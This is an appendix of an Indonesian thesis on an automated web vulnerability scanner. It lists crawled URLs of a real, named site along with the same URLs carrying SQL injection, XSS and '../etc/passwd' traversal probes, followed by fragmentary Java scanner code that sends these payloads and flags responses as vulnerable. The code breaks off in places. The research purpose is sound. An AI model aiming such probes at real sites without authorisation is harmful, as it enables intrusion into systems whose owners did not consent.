LAMPIRAN A : Tabel
1.
Tabel 4.7 Hasil crawling sampel 1
No.
Daftar URL website
1
http://www.raahauges.com
/index.php
2
http://www.raahauges.com
/supporters.php
3
http://www.raahauges.com
/shotgun-range.php
4
http://www.raahauges.com
/hunting.php
5
http://www.raahauges.com
/sports-fair.php
6
http://www.raahauges.com
/events-calendar.php
7
http://www.raahauges.com
/contact.php
8
http://www.raahauges.com
/news.php
9
http://www.raahauges.com
/shoot-results.php
10
http://www.raahauges.com
/find-raahauges.php
11
http://www.raahauges.com
/view-news.php?id=9
12
http://www.raahauges.com
/view-news.php?id=8
13
http://www.raahauges.com
/view-news.php?id=10
14
http://www.raahauges.com
/SportsFairFlyer2014.pdf
15
http://www.raahauges.com
/index.php?prm=09&chm=-1#mini-calendar
16
http://www.raahauges.com
/index.php?prm=09&chm=1#mini-calendar
17
http://www.raahauges.com
/events-calendar.php?d=2014-09-13
18
http://www.raahauges.com
/events-calendar.php?d=2014-09-14
19
http://www.raahauges.com
/events-calendar.php?d=2014-09-17
20
http://www.raahauges.com
/events-calendar.php?d=2014-09-18
21
http://www.raahauges.com
/events-calendar.php?d=2014-09-19
22
http://www.raahauges.com
/events-calendar.php?d=2014-09-20
23
http://www.raahauges.com
/events-calendar.php?d=2014-09-21
2.
Tabel 4.8 Hasil skenario penyerangan SQL Injection sampel 1
3.
No.
Daftar URL website yang telah dimanipulasi
1
http://www.raahauges.com
/index.php%27
2
http://www.raahauges.com
/supporters.php%27
3
http://www.raahauges.com
/shotgun-range.php%27
4
http://www.raahauges.com
/hunting.php%27
5
http://www.raahauges.com
/sports-fair.php%27
6
http://www.raahauges.com
/events-calendar.php%27
7
http://www.raahauges.com
/contact.php%27
8
http://www.raahauges.com
/news.php%27
9
http://www.raahauges.com
/shoot-results.php%27
10
http://www.raahauges.com
/find-raahauges.php%27
11
http://www.raahauges.com
/view-news.php?id=9%27
12
http://www.raahauges.com
/view-news.php?id=8%27
13
http://www.raahauges.com
/view-news.php?id=10%27
14
http://www.raahauges.com
/SportsFairFlyer2014.pdf%27
15
http://www.raahauges.com
/index.php?prm=09&chm=-1#mini-calendar%27
16
http://www.raahauges.com
/index.php?prm=09&chm=1#mini-calendar%27
17
http://www.raahauges.com
/events-calendar.php?d=2014-09-13%27
18
http://www.raahauges.com
/events-calendar.php?d=2014-09-14%27
19
http://www.raahauges.com
/events-calendar.php?d=2014-09-17%27
20
http://www.raahauges.com
/events-calendar.php?d=2014-09-18%27
21
http://www.raahauges.com
/events-calendar.php?d=2014-09-19%27
22
http://www.raahauges.com
/events-calendar.php?d=2014-09-20%27
23
http://www.raahauges.com
/events-calendar.php?d=2014-09-21%27
3.
Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1
No.
Daftar URL website yang telah dimanipulasi
1
http://www.raahauges.com
/index.php%20%27%3E%3C%68%31%3E%54
%65%73%74%69%6E%67%3C%2F%68%31%3E
2
http://www.raahauges.com
/supporters.php%20%27%3E%3C%68%31%3E
%54%65%73%74%69%6E%67%3C%2F%68%31%3E
3
http://www.raahauges.com
/shotgun-range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67
%3C%2F%68%31%3E
4
http://www.raahauges.com
/hunting.php%20%27%3E%3C%68%31%3E%5
4%65%73%74%69%6E%67%3C%2F%68%31%3E
5
http://www.raahauges.com
/sports-fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3
C%2F%68%31%3E
6
http://www.raahauges.com
/events-calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%
67%3C%2F%68%31%3E
7
http://www.raahauges.com
/contact.php%20%27%3E%3C%68%31%3E%5
4%65%73%74%69%6E%67%3C%2F%68%31%3E
8
http://www.raahauges.com
/news.php%20%27%3E%3C%68%31%3E%54
%65%73%74%69%6E%67%3C%2F%68%31%3E
9
http://www.raahauges.com
/shoot-results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67
%3C%2F%68%31%3E
10
http://www.raahauges.com
/find-raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E
%67%3C%2F%68%31%3E
11
http://www.raahauges.com
/view-news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E
4.
Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1
No.
Daftar URL website yang telah dimanipulasi
12
http://www.raahauges.com
/view-news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E
%67%3C%2F%68%31%3E
13
http://www.raahauges.com
/view-news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6
E%67%3C%2F%68%31%3E
14
http://www.raahauges.com
/SportsFairFlyer2014.pdf%20%27%3E%3C%68
%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
15
http://www.raahauges.com
/index.php?prm=09&chm=-1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%
3C%2F%68%31%3E
16
http://www.raahauges.com
/index.php?prm=09&chm=1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%
3C%2F%68%31%3E
17
http://www.raahauges.com
/events-calendar.php?d=2014-09-13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
18
http://www.raahauges.com
/events-calendar.php?d=2014-09-14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
19
http://www.raahauges.com
/events-calendar.php?d=2014-09-17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
20
http://www.raahauges.com
/events-calendar.php?d=2014-09-18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
21
http://www.raahauges.com
/events-calendar.php?d=2014-09-19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
5.
Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1
No.
Daftar URL website yang telah dimanipulasi
22
http://www.raahauges.com
/events-calendar.php?d=2014-09-20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
23
http://www.raahauges.com
/events-calendar.php?d=2014-09-21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
24
http://www.raahauges.com
/events-calendar.php?d=2014-09-28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E
6.
Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel 1
No.
Daftar URL website yang telah dimanipulasi
1
http://www.raahauges.com
/index.php../../../../../../../../../../etc/passwd
2
http://www.raahauges.com
/supporters.php../../../../../../../../../../etc/passwd
3
http://www.raahauges.com
/shotgun-range.php../../../../../../../../../../etc/passwd
4
http://www.raahauges.com
/hunting.php../../../../../../../../../../etc/passwd
5
http://www.raahauges.com
/sports-fair.php../../../../../../../../../../etc/passwd
6
http://www.raahauges.com
/events-calendar.php../../../../../../../../../../etc/passwd
7
http://www.raahauges.com
/contact.php../../../../../../../../../../etc/passwd
8
http://www.raahauges.com
/news.php../../../../../../../../../../etc/passwd
7.
Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel
No.
Daftar URL website yang telah dimanipulasi
10
http://www.raahauges.com
/find-raahauges.php../../../../../../../../../../etc/passwd
11
http://www.raahauges.com
/view-news.php?id=9../../../../../../../../../../etc/passwd
12
http://www.raahauges.com
/view-news.php?id=8../../../../../../../../../../etc/passwd
13
http://www.raahauges.com
/view-news.php?id=10
14
http://www.raahauges.com
/SportsFairFlyer2014.pdf../../../../../../../../../../etc/pass
wd
15
http://www.raahauges.com
/index.php?prm=09&chm=-1#mini-calendar../../../../../../../../../../etc/passwd
16
http://www.raahauges.com
/index.php?prm=09&chm=1#mini-calendar../../../../../../../../../../etc/passwd
17
http://www.raahauges.com
/events-calendar.php?d=2014-09-13../../../../../../../../../../etc/passwd
18
http://www.raahauges.com
/events-calendar.php?d=2014-09-14../../../../../../../../../../etc/passwd
19
http://www.raahauges.com
/events-calendar.php?d=2014-09-17../../../../../../../../../../etc/passwd
20
http://www.raahauges.com
/events-calendar.php?d=2014-09-18../../../../../../../../../../etc/passwd
21
http://www.raahauges.com
/events-calendar.php?d=2014-09-19../../../../../../../../../../etc/passwd
22
http://www.raahauges.com
/events-calendar.php?d=2014-09-20../../../../../../../../../../etc/passwd
23
http://www.raahauges.com
/events-calendar.php?d=2014-09-21../../../../../../../../../../etc/passwd
24
http://www.raahauges.com
LAMPIRAN B: Potongan Source Code Aplikasi
public class AutoScannerSQLI extends javax.swing.JFrame { private String save[]= new String [250];
private String testBasic=""; private String testBlind=""; private String testBlind2=""; private int hasilPencarian=0; private String inputURL="";
ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();
read_byPassHttpError identifikasi = new read_byPassHttpError(null);
listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0);
inputURL= url_Site.getText();
String typeAttack = tipeSerangan.getSelectedItem().toString();
//Cek penulisan URL
if ((verifyUrl(inputURL) != null)&&(typeAttack!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai");
hasilScanSQLi.append("Situs yang di scan "+ inputURL+" \n");
hasilScanSQLi.append("Jenis Serangan SQL Injection \n"+"tipe serangan : "+ typeAttack +"\n");
listOfReportsVulnerable.add("Tipe serangan : "+ typeAttack +"\n");
} else {
}
Elements links = doc.select("a[href]"); int i=0;
} catch (IOException e) {e.printStackTrace();} }
//Fungsi ATTAck Scenario Blind Sql Injection private void attackScenarioBlindTrue(){ String serangan1="%20and%201=1--"; String serangan2="%20and%201=0--"; int size1=0, size2=0;
if((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse))||(size1==size2)){ hasilScanSQLi.append(save[i]+" => "+"Tidak Vulnerable\n"); listOfReportsVulnerable.add(save[i]+" => "+"Tidak Vulnerable\n"); }
else {
listOfReportsVulnerable.add(save[i]+" => "+"Vulnerable");
private void attackScenarioBlindFalse(String serangan){ for(int i=0; i<save.length-1;i++){
//Fungsi fingerprinting -> untuk membaca back end dari database server
//Analisis respon yang diberikan untuk menemukan apakah rentan diserang atau tidak private void readResponAttack(String SQLTest){
2. AutoScannerXSS.java
public class AutoScannerXSS extends javax.swing.JFrame { private String listUrlXSS []= new String [250];
private String hasilRead=""; private String tipeAttack=""; private int hasilPencarian=0;
ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();}
public AutoScannerXSS() { initComponents(); }
private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) { String situs =urlXSS.getText();
attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E");
}
else if(tipeAttack.equals("<script>alert(123)</script>")) {
attackScenarioXSS("%20<script>alert(123)</script>"); }
else if(tipeAttack.equals("'<script>alert(123);</script>")) {
attackScenarioXSS("%20'<script>alert(123);</script>"); } }
private void attackScenarioXSS(String serangan){
for( int i=0; i<listUrlXSS.length-1;i++){ if(listUrlXSS[i]!=null){
// String testXSS=listUrlXSS[i]+serangan; // listUrlXSS2[i]=listUrlXSS[i]+serangan; // readResponAttack(testXSS);
byPassError(listUrlXSS[i],serangan);
} else break;
} }
private void readResponAttack(String SQLTest){ Document doc
try {// need http protocol
doc = Jsoup.connect(SQLTest).timeout(5000)
.ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();
// get page title
String title = doc.title();
System.out.println("title : " + title); String isi = doc.body().text();
Pattern p =Pattern.compile(tipeAttack); Matcher m = p.matcher(isi);
int start =0;
while(m.find(start)){
System.out.println("Match Found \n"+ m.group(1)+ "at position "+m.start()); start= m.end();
System.out.println("Testing : "+m.find(0)); if( m.find(0)){
hasilXSS.append(" Vulnerable"); }
else { hasilXSS.append("NO Vulnerable"); } }
3. AutoScannerFileInclusion.java
public class AutoScannerFileInclusion extends javax.swing.JFrame { private String listUrl[]= new String [250];
private String inputURL=""; private int hasilPencarian=0;
ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();
public AutoScannerFileInclusion() { initComponents(); }
listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0);
inputURL= url_Site.getText();
String serangan= tipeSerangan.getSelectedItem().toString();
if ((verifyUrl(inputURL) != null)&&(serangan!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai"); hasilScan.append("Situs yang di scan "+ inputURL+" \n");
hasilScan.append("Jenis Serangan File Inclusion \n"+"Tipe serangan : "+ serangan +"\n");
} else {
JOptionPane.showMessageDialog(null,"The entered URL is not valid. Please enter again:");
url_Site.requestFocus(); }
websiteCrawler(inputURL); //Fase Attack
if(serangan.equals("File Inclusion")){ attackScenarioFileInclusion("../"); tampil();
}
else if(serangan.equals("File Inclusion with Null")){ attackScenarioFileInclusion("../%00");
.ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();
// get page title
String title = doc.title();
//System.out.println("title : " + title); // get all links
Elements links = doc.select("a[href]"); int i=0;
for (Element link : links) {
// System.out.println("\nlink : " + link.attr("abs:href")); if(link.attr("abs:href").contains(url)){
listUrl[i]=link.attr("abs:href"); i++;
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
//Attack Skenario (Data Validation Testing)
private void attackScenarioFileInclusion(String serangan){
for( int i=0; i<listUrl.length-1;i++){ if(listUrl[i]!=null){
String testFileInclusion=listUrl[i];
byPassError(testFileInclusion,serangan);
}
else break; } }
//Finger Printing back end respon create by INdra Nababan public void byPassError(String url,String serangan) {
int size=0; String s=null; s=url+serangan; BufferedReader in=null;
try {URL obj = new URL(s);
HttpURLConnection conn = (HttpURLConnection) obj.openConnection(); conn.setReadTimeout(0);
conn.setRequestProperty("User-Agent","Mozilla/5.0 ( compatible ) "); conn.setRequestProperty("Accept","*/*");
System.out.println("Request URL ... " +s);
boolean redirect = false;
// normally, 3xx is redirect
int status = conn.getResponseCode(); if (status != HttpURLConnection.HTTP_OK) {
if (status == HttpURLConnection.HTTP_MOVED_TEMP || status == HttpURLConnection.HTTP_MOVED_PERM || status == HttpURLConnection.HTTP_SEE_OTHER)
}
System.out.println("Response Code ... " + status);
if (redirect) {
// get redirect url from "location" header field String newUrl = conn.getHeaderField("Location");
// get the cookie if need, for login
String cookies = conn.getHeaderField("Set-Cookie");
// open the new connnection again conn = (HttpURLConnection) new URL(newUrl).openConnection();
conn.setRequestProperty("Cookie", cookies); conn.setRequestProperty("User-Agent","Mozilla/5.0 ( compatible ) ");
conn.setRequestProperty("Accept","*/*");
System.out.println("Redirect to URL : " + newUrl);
}
boolean isError = conn.getResponseCode() >= 400; //The normal input stream doesn't work in error-cases. //is = isError ? con.getErrorStream() : con.getInputStream(); if(isError){
in = new BufferedReader( new InputStreamReader(conn.getErrorStream())); } else{
in = new BufferedReader( new InputStreamReader(obj.openStream())); }
String inputLine;
StringBuffer html = new StringBuffer();
while ((inputLine = in.readLine()) != null) { html.append(inputLine+"\n");
}
in.close(); String hasil=html.toString();
Pattern p =Pattern.compile("<b>Warning</b>"); Matcher m = p.matcher(hasil);
String test="";
int start =0; if(m.find(0)){
hasilScan.append(s+" => "+"VULNERABLE"+"\n");
listOfReportsVulnerable.add(url+" => "+"VULNERABLE"+"\n"); listOfReports.add(url+" => "+"VULNERABLE"+"\n");
hasilPencarian+=1; }
else {
hasilScan.append(s+" => "+"Not Vulnerable\n");
listOfReports.add(url+" => "+"Not VULNERABLE"+"\n"); }